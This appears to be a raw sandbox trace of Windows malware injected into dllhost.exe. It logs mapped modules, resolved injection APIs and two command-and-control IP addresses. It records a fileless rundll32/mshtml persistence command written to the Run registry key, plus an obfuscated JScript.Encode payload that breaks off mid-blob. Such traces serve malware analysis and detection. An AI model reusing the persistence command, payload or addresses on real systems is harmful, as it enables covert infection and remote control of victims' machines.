filename = "" Region: id = 613 start_va = 0x76a00000 end_va = 0x76acbfff entry_point = 0x76a0168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 614 start_va = 0x76ad0000 end_va = 0x76b2ffff entry_point = 0x76ae158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 615 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 616 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 617 start_va = 0x8d0000 end_va = 0xa50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 618 start_va = 0xa60000 end_va = 0x1e5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 619 start_va = 0x1e60000 end_va = 0x418cfff entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 620 start_va = 0x75380000 end_va = 0x753b4fff entry_point = 0x7538145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 621 start_va = 0x76bd0000 end_va = 0x76bd5fff entry_point = 0x76bd1782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 622 start_va = 0x1a0000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 623 start_va = 0x77100000 end_va = 0x77156fff entry_point = 0x77119ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 624 start_va = 0x76be0000 end_va = 0x76cd4fff entry_point = 0x76be1865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 625 start_va = 0x76470000 end_va = 0x765a5fff entry_point = 0x76471b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 626 start_va = 0x763e0000 end_va = 0x7646efff entry_point = 0x763e3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 627 start_va = 0x768e0000 end_va = 0x769fcfff entry_point = 0x768e158a region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 628 start_va = 0x77530000 end_va = 0x7753bfff entry_point = 0x7753238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 629 start_va = 0x76d30000 end_va = 0x76f2afff entry_point = 0x76d322d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 630 start_va = 0x75760000 end_va = 0x75789fff entry_point = 0x757612fa region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\SysWOW64\\imagehlp.dll" (normalized: "c:\\windows\\syswow64\\imagehlp.dll") Region: id = 631 start_va = 0xe0000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 632 start_va = 0x74a50000 end_va = 0x74a66fff entry_point = 0x74a51c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 633 start_va = 0x74e00000 end_va = 0x74e0afff entry_point = 0x74e01992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 634 start_va = 0x4190000 end_va = 0x445efff entry_point = 0x4190000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 635 start_va = 0x370000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 636 start_va = 0x490000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 637 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 638 start_va = 0x738b0000 end_va = 0x7392ffff entry_point = 0x738c37c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 639 start_va = 0x270000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 640 start_va = 0x4d0000 end_va = 0x5aefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 641 start_va = 0x2b0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 642 start_va = 0x310000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 643 start_va = 0x3c0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 644 start_va = 0x4490000 end_va = 0x44cffff entry_point = 0x0 region_type = private name = "private_0x0000000004490000" filename = "" Region: id = 645 start_va = 0x45e0000 end_va = 0x461ffff entry_point = 0x0 region_type = private name = "private_0x00000000045e0000" filename = "" Region: id = 646 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 647 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 648 start_va = 0x120000 end_va = 0x121fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 649 start_va = 0x74e10000 end_va = 0x74fadfff entry_point = 0x74e3e6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 650 start_va = 0x130000 end_va = 0x130fff entry_point = 0x130000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 651 start_va = 0x140000 end_va = 0x141fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 652 start_va = 0x75790000 end_va = 0x763d9fff entry_point = 0x75811601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 653 start_va = 0x130000 end_va = 0x130fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 654 start_va = 0x150000 end_va = 0x15bfff entry_point = 0x150000 region_type = mapped_file name = "index.dat" filename = "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 655 start_va = 0x160000 end_va = 0x167fff entry_point = 0x160000 region_type = mapped_file name = "index.dat" filename = "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 656 start_va = 0x170000 end_va = 0x17ffff entry_point = 0x170000 region_type = mapped_file name = "index.dat" filename = "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 657 start_va = 0x74d80000 end_va = 0x74dc3fff entry_point = 0x74d963f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 658 start_va = 0x1a0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 659 start_va = 0x230000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 660 start_va = 0x74d60000 end_va = 0x74d7bfff entry_point = 0x74d6a431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 661 start_va = 0x74d50000 end_va = 0x74d56fff entry_point = 0x74d5128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 662 start_va = 0x74d10000 end_va = 0x74d4bfff entry_point = 0x74d1145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 663 start_va = 0x4620000 end_va = 0x47affff entry_point = 0x0 region_type = private name = "private_0x0000000004620000" filename = "" Region: id = 664 start_va = 0x74d00000 end_va = 0x74d04fff entry_point = 0x74d015df region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 665 start_va = 0x74cf0000 end_va = 0x74cfffff entry_point = 0x74cf38c1 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll") Region: id = 666 start_va = 0x47b0000 end_va = 0x49affff entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 667 start_va = 0x350000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 668 start_va = 0x74ce0000 end_va = 0x74ceffff entry_point = 0x74ce1526 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\SysWOW64\\NapiNSP.dll" (normalized: "c:\\windows\\syswow64\\napinsp.dll") Region: id = 669 start_va = 0x44e0000 end_va = 0x451ffff entry_point = 0x0 region_type = private name = "private_0x00000000044e0000" filename = "" Region: id = 670 start_va = 0x4660000 end_va = 0x469ffff entry_point = 0x0 region_type = private name = "private_0x0000000004660000" filename = "" Region: id = 671 start_va = 0x4770000 end_va = 0x47affff entry_point = 0x0 region_type = private name = "private_0x0000000004770000" filename = "" Region: id = 672 start_va = 0x74cc0000 end_va = 0x74cd1fff entry_point = 0x74cc18f2 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\SysWOW64\\pnrpnsp.dll" (normalized: "c:\\windows\\syswow64\\pnrpnsp.dll") Region: id = 673 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 674 start_va = 0x74cb0000 end_va = 0x74cb7fff entry_point = 0x74cb131e region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\SysWOW64\\winrnr.dll" (normalized: "c:\\windows\\syswow64\\winrnr.dll") Region: id = 675 start_va = 0x74c70000 end_va = 0x74ca7fff entry_point = 0x74c7990e region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 676 start_va = 0x49b0000 end_va = 0x4baffff entry_point = 0x0 region_type = private name = "private_0x00000000049b0000" filename = "" Region: id = 677 start_va = 0x74c60000 end_va = 0x74c65fff entry_point = 0x74c614b2 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Thread: id = 20 os_tid = 0xa98 [0047.171] GetProcAddress (hModule=0x765b0000, lpProcName="VirtualAlloc") returned 0x765c1856 [0047.171] VirtualAlloc (lpAddress=0x0, dwSize=0x232d000, flAllocationType=0x3000, flProtect=0x40) returned 0x1e60000 [0047.172] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x765b0000 [0047.172] GetProcAddress (hModule=0x765b0000, lpProcName="GetModuleHandleA") returned 0x765c1245 [0047.172] GetProcAddress (hModule=0x765b0000, lpProcName="GetProcAddress") returned 0x765c1222 [0047.172] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77560000 [0047.172] GetProcAddress (hModule=0x77560000, lpProcName="atoi") returned 0x775ad2f3 [0047.172] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75380000 [0047.175] GetProcAddress (hModule=0x75380000, lpProcName=0x10) returned 0x75386b0e [0047.175] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x77100000 [0047.176] GetProcAddress (hModule=0x77100000, lpProcName="StrStrA") returned 0x7712c45b [0047.176] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x76be0000 [0047.184] GetProcAddress (hModule=0x76be0000, lpProcName="InternetCrackUrlA") returned 0x76bed075 [0047.184] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x753c0000 [0047.184] GetProcAddress (hModule=0x753c0000, lpProcName="UuidCreateSequential") returned 0x753e7c12 [0047.184] LoadLibraryA (lpLibFileName="imagehlp.dll") returned 0x75760000 [0047.188] GetProcAddress (hModule=0x75760000, lpProcName="CheckSumMappedFile") returned 0x75768303 [0047.188] LoadLibraryA (lpLibFileName="USERENV.dll") returned 0x74a50000 [0047.193] GetProcAddress (hModule=0x74a50000, lpProcName="CreateEnvironmentBlock") returned 0x74a51a7a [0047.193] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x76760000 [0047.193] GetProcAddress (hModule=0x76760000, lpProcName="RegCloseKey") returned 0x7677469d [0047.193] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75570000 [0047.193] GetProcAddress (hModule=0x75570000, lpProcName="CoInitialize") returned 0x7558b636 [0047.471] VirtualProtect (in: lpAddress=0x1e6015f, dwSize=0x78, flNewProtect=0x4, lpflOldProtect=0x2af2fc | out: lpflOldProtect=0x2af2fc*=0x40) returned 1 [0047.471] VirtualProtect (in: lpAddress=0x1e6015f, dwSize=0x78, flNewProtect=0x40, lpflOldProtect=0x2af2fc | out: lpflOldProtect=0x2af2fc*=0x4) returned 1 [0047.471] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77560000 [0047.471] GetProcAddress (hModule=0x77560000, lpProcName="atoi") returned 0x775ad2f3 [0047.471] GetProcAddress (hModule=0x77560000, lpProcName="sscanf") returned 0x776354a7 [0047.471] GetProcAddress (hModule=0x77560000, lpProcName="strncpy") returned 0x775d5c30 [0047.471] GetProcAddress (hModule=0x77560000, lpProcName="ZwSetValueKey") returned 0x775801b4 [0047.471] GetProcAddress (hModule=0x77560000, lpProcName="ZwQueryValueKey") returned 0x7757fa98 [0047.472] GetProcAddress (hModule=0x77560000, lpProcName="ZwQueueApcThread") returned 0x7757ff14 [0047.472] GetProcAddress (hModule=0x77560000, lpProcName="ZwCreateKey") returned 0x7757fb30 [0047.472] GetProcAddress (hModule=0x77560000, lpProcName="RtlRandom") returned 0x776298c3 [0047.472] GetProcAddress (hModule=0x77560000, lpProcName="_snprintf") returned 0x77634760 [0047.472] GetProcAddress (hModule=0x77560000, lpProcName="_vsnprintf") returned 0x775d9d88 [0047.472] GetProcAddress (hModule=0x77560000, lpProcName="RtlImageNtHeader") returned 0x77593164 [0047.472] GetProcAddress (hModule=0x77560000, lpProcName="_chkstk") returned 0x7759ad68 [0047.472] GetProcAddress (hModule=0x77560000, lpProcName="memset") returned 0x7758df20 [0047.472] GetModuleHandleA (lpModuleName="WS2_32.dll") returned 0x75380000 [0047.472] GetProcAddress (hModule=0x75380000, lpProcName=0x10) returned 0x75386b0e [0047.472] GetProcAddress (hModule=0x75380000, lpProcName=0x73) returned 0x75383ab2 [0047.472] GetProcAddress (hModule=0x75380000, lpProcName=0x3) returned 0x75383918 [0047.472] GetProcAddress (hModule=0x75380000, lpProcName=0x13) returned 0x75386f01 [0047.472] GetProcAddress (hModule=0x75380000, lpProcName=0x4) returned 0x75386bdd [0047.472] GetProcAddress (hModule=0x75380000, lpProcName=0x34) returned 0x75397673 [0047.472] GetProcAddress (hModule=0x75380000, lpProcName=0x17) returned 0x75383eb8 [0047.472] GetModuleHandleA (lpModuleName="SHLWAPI.dll") returned 0x77100000 [0047.473] GetProcAddress (hModule=0x77100000, lpProcName="StrStrA") returned 0x7712c45b [0047.473] GetProcAddress (hModule=0x77100000, lpProcName="PathUnquoteSpacesA") returned 0x7712ecc7 [0047.473] GetProcAddress (hModule=0x77100000, lpProcName="PathFindFileNameA") returned 0x771100aa [0047.473] GetProcAddress (hModule=0x77100000, lpProcName="StrCmpNIA") returned 0x7710d11c [0047.473] GetProcAddress (hModule=0x77100000, lpProcName="StrChrA") returned 0x7710c5e6 [0047.473] GetProcAddress (hModule=0x77100000, lpProcName="StrStrIA") returned 0x7710d250 [0047.473] GetModuleHandleA (lpModuleName="WININET.dll") returned 0x76be0000 [0047.473] GetProcAddress (hModule=0x76be0000, lpProcName="InternetCrackUrlA") returned 0x76bed075 [0047.473] GetModuleHandleA (lpModuleName="RPCRT4.dll") returned 0x753c0000 [0047.473] GetProcAddress (hModule=0x753c0000, lpProcName="UuidCreateSequential") returned 0x753e7c12 [0047.473] GetModuleHandleA (lpModuleName="imagehlp.dll") returned 0x75760000 [0047.473] GetProcAddress (hModule=0x75760000, lpProcName="CheckSumMappedFile") returned 0x75768303 [0047.473] GetModuleHandleA (lpModuleName="USERENV.dll") returned 0x74a50000 [0047.473] GetProcAddress (hModule=0x74a50000, lpProcName="CreateEnvironmentBlock") returned 0x74a51a7a [0047.473] GetModuleHandleA (lpModuleName="KERNEL32.dll") returned 0x765b0000 [0047.473] GetProcAddress (hModule=0x765b0000, lpProcName="ExitThread") returned 0x775bd598 [0047.473] GetProcAddress (hModule=0x765b0000, lpProcName="ExitProcess") returned 0x765c7a10 [0047.474] GetProcAddress (hModule=0x765b0000, lpProcName="GetModuleFileNameA") returned 0x765c14b1 [0047.474] GetProcAddress (hModule=0x765b0000, lpProcName="CreateEventA") returned 0x765c328c [0047.474] GetProcAddress (hModule=0x765b0000, lpProcName="TerminateThread") returned 0x765c7a2f [0047.474] GetProcAddress (hModule=0x765b0000, lpProcName="WinExec") returned 0x76642c21 [0047.474] GetProcAddress (hModule=0x765b0000, lpProcName="WriteFile") returned 0x765c1282 [0047.474] GetProcAddress (hModule=0x765b0000, lpProcName="CreateFileA") returned 0x765c53c6 [0047.474] GetProcAddress (hModule=0x765b0000, lpProcName="GetTempFileNameA") returned 0x765e9d3f [0047.474] GetProcAddress (hModule=0x765b0000, lpProcName="GetTempPathA") returned 0x765e276c [0047.474] GetProcAddress (hModule=0x765b0000, lpProcName="Sleep") returned 0x765c10ff [0047.474] GetProcAddress (hModule=0x765b0000, lpProcName="TerminateProcess") returned 0x765dd802 [0047.474] GetProcAddress (hModule=0x765b0000, lpProcName="GetExitCodeThread") returned 0x765dd5b5 [0047.474] GetProcAddress (hModule=0x765b0000, lpProcName="WaitForSingleObject") returned 0x765c1136 [0047.474] GetProcAddress (hModule=0x765b0000, lpProcName="ResumeThread") returned 0x765c43ef [0047.474] GetProcAddress (hModule=0x765b0000, lpProcName="WriteProcessMemory") returned 0x765dd9e0 [0047.474] GetProcAddress (hModule=0x765b0000, lpProcName="VirtualAllocEx") returned 0x765dd9b0 [0047.474] GetProcAddress (hModule=0x765b0000, lpProcName="CreateProcessA") returned 0x765c1072 [0047.474] GetProcAddress (hModule=0x765b0000, lpProcName="ExpandEnvironmentStringsA") returned 0x765deb39 [0047.475] GetProcAddress (hModule=0x765b0000, lpProcName="GetTickCount") returned 0x765c110c [0047.475] GetProcAddress (hModule=0x765b0000, lpProcName="GetVersionExA") returned 0x765c3519 [0047.475] GetProcAddress (hModule=0x765b0000, lpProcName="CloseHandle") returned 0x765c1410 [0047.475] GetProcAddress (hModule=0x765b0000, lpProcName="LoadLibraryA") returned 0x765c49d7 [0047.475] GetProcAddress (hModule=0x765b0000, lpProcName="GetProcAddress") returned 0x765c1222 [0047.475] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0047.475] GetProcAddress (hModule=0x765b0000, lpProcName="GetLastError") returned 0x765c11c0 [0047.475] GetProcAddress (hModule=0x765b0000, lpProcName="GetModuleHandleA") returned 0x765c1245 [0047.475] GetProcAddress (hModule=0x765b0000, lpProcName="VirtualFree") returned 0x765c186e [0047.475] GetProcAddress (hModule=0x765b0000, lpProcName="VirtualAlloc") returned 0x765c1856 [0047.475] GetModuleHandleA (lpModuleName="ADVAPI32.dll") returned 0x76760000 [0047.475] GetProcAddress (hModule=0x76760000, lpProcName="RegSetValueExW") returned 0x767714d6 [0047.475] GetProcAddress (hModule=0x76760000, lpProcName="RegQueryValueExW") returned 0x767746ad [0047.475] GetProcAddress (hModule=0x76760000, lpProcName="RegQueryValueExA") returned 0x767748ef [0047.475] GetProcAddress (hModule=0x76760000, lpProcName="RegSetValueExA") returned 0x767714b3 [0047.476] GetProcAddress (hModule=0x76760000, lpProcName="RegCreateKeyExA") returned 0x76771469 [0047.476] GetProcAddress (hModule=0x76760000, lpProcName="RegCloseKey") returned 0x7677469d [0047.476] GetProcAddress (hModule=0x76760000, lpProcName="OpenProcessToken") returned 0x76774304 [0047.476] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x75570000 [0047.476] GetProcAddress (hModule=0x75570000, lpProcName="CoInitialize") returned 0x7558b636 [0047.476] UuidCreateSequential (in: Uuid=0x2af1ec | out: Uuid=0x2af1ec) returned 0x0 [0047.477] _snprintf (in: _Dest=0x418a648, _Count=0x103, _Format="%x%x%x%x%x%x" | out: _Dest="c43dc7584a0") returned 11 [0047.477] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName="c43dc7584a0") returned 0xa4 [0047.477] GetLastError () returned 0x0 [0047.477] GetModuleHandleA (lpModuleName=0x0) returned 0x190000 [0047.477] GetModuleFileNameA (in: hModule=0x190000, lpFilename=0x2af208, nSize=0x104 | out: lpFilename="C:\\Windows\\syswow64\\dllhost.exe" (normalized: "c:\\windows\\syswow64\\dllhost.exe")) returned 0x1f [0047.477] StrStrIA (lpFirst="C:\\Windows\\syswow64\\dllhost.exe", lpSrch="powershell.exe") returned 0x0 [0047.479] RtlImageNtHeader (BaseAddress=0x61104) returned 0x61144 [0047.480] strncpy (in: _Dest=0x2167248, _Source="060414;8;178.89.159.34,178.89.159.35;1", _Count=0x1000 | out: _Dest="060414;8;178.89.159.34,178.89.159.35;1") returned="060414;8;178.89.159.34,178.89.159.35;1" [0047.480] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x75260000 [0047.480] GetProcAddress (hModule=0x75260000, lpProcName="_beginthreadex") returned 0x7527132e [0047.480] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x1e61c77, _ArgList=0x0, _InitFlag=0x0, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0xa8 [0047.480] CloseHandle (hObject=0xa8) returned 1 [0047.480] RtlExitUserThread (Status=0x2a) Thread: id = 21 os_tid = 0xa9c [0047.481] CoInitialize (pvReserved=0x0) returned 0x0 [0047.489] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x1e61133, _ArgList=0x0, _InitFlag=0x0, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0xc4 [0047.490] CloseHandle (hObject=0xc4) returned 1 [0047.490] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x1e61af5, _ArgList=0x0, _InitFlag=0x0, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0xc4 [0047.490] CloseHandle (hObject=0xc4) returned 1 Thread: id = 22 os_tid = 0xaa0 [0047.494] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="software\\microsoft\\windows\\currentversion\\run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf013f, lpSecurityAttributes=0x0, phkResult=0x44cf9dc, lpdwDisposition=0x0 | out: phkResult=0x44cf9dc*=0xc8, lpdwDisposition=0x0) returned 0x0 [0047.494] NtQueryValueKey (in: KeyHandle=0xc8, ValueName="", KeyValueInformationClass=0x2, KeyValueInformation=0x2064030, Length=0x2000, ResultLength=0x2064028 | out: KeyValueInformation=0x2064030*(TitleIndex=0x0, Type=0x1, DataLength=0x1d0, Data="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write(\"\\74script language=jscript.encode>\"+(new%20ActiveXObject(\"WScript.Shell\")).RegRead(\"HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run\\\\\")+\"\\74/script>\")"), ResultLength=0x2064028) returned 0x0 [0047.494] RegQueryValueExW (in: hKey=0xc8, lpValueName=0x0, lpReserved=0x0, lpType=0x0, lpData=0x1e64028, lpcbData=0x1e64024*=0x200000 | out: lpType=0x0, lpData=0x1e64028*=0x23, lpcbData=0x1e64024*=0xef54) returned 0x0 [0047.497] RegCloseKey (hKey=0xc8) returned 0x0 [0047.498] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="software\\microsoft\\windows\\currentversion\\run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf013f, lpSecurityAttributes=0x0, phkResult=0x44cf9dc, lpdwDisposition=0x0 | out: phkResult=0x44cf9dc*=0xc8, lpdwDisposition=0x0) returned 0x0 [0047.498] NtSetValueKey (in: KeyHandle=0xc8, ValueName="", TitleIndex=0x0, Type=0x1, Data="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write(\"\\74script language=jscript.encode>\"+(new%20ActiveXObject(\"WScript.Shell\")).RegRead(\"HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run\\\\\")+\"\\74/script>\")", DataSize=0x1d0 | out: Data="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write(\"\\74script language=jscript.encode>\"+(new%20ActiveXObject(\"WScript.Shell\")).RegRead(\"HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run\\\\\")+\"\\74/script>\")") returned 0x0 [0047.498] RegSetValueExW (in: hKey=0xc8, lpValueName=0x0, Reserved=0x0, dwType=0x1, lpData="#@~^kXcAAA==W!x^DkKxP^WTcV*\x09ODH\x09ax\x09+h,)mDk\\\x7fp64N+1YcJ\\dX:s cj+M\\n.oHSuP:n vcTr#IXRKw+\x09`r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn\x09Nc#p.\x7fY;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\\\x7fpr(Ln^D`J\x09j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92\x09\\rDGUs+UYUODbxLdvJ]Ar\x09NrDuE*i2{h3J-'/HdhKh\x7fc'-Ar\x09NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW'\x09nSP)1Yb\\+or(%+1YcJUm.raYk\x09LRwkV\x7fjz/D+sr8Ln^DJbi6;x1YrG\x09Pm[Uv#`YMzPDnDEMxPmR\"no\"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw-\x09nY,0.Cs+hG.0Pd+D;a-w\x09Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PD\x7fY;DU~ZiN86;x1YrG\x09PNc;*\x09a'\x09nSP)1Yb\\+or(%+1YcJt/ah^ RUnD7+Do\\JC:KhR\x7fRTE*iaRK2+\x09`E!AKJS;B0CVkn*iac/\x7fxNv#p;0\x09'CRA62C\x09N2\x09-kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP\x7f6Yor^+cE6UD~OME\x7f~O8#pr0vEWY*\x09;WDR\x7fMrY\x7f`6c.n/aW\x09/nAG[H#IE6OR;VGd\x7f`#I;6'WR;.\x7flO\x7fK\x7f6Ywk^n`!0U~DD;n*iE6O'6RM\x7fOok^+vEWxObpEW/{;0DR62\x7fxbdP\x7f6O?D.\x7flhv#pE0kR\"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 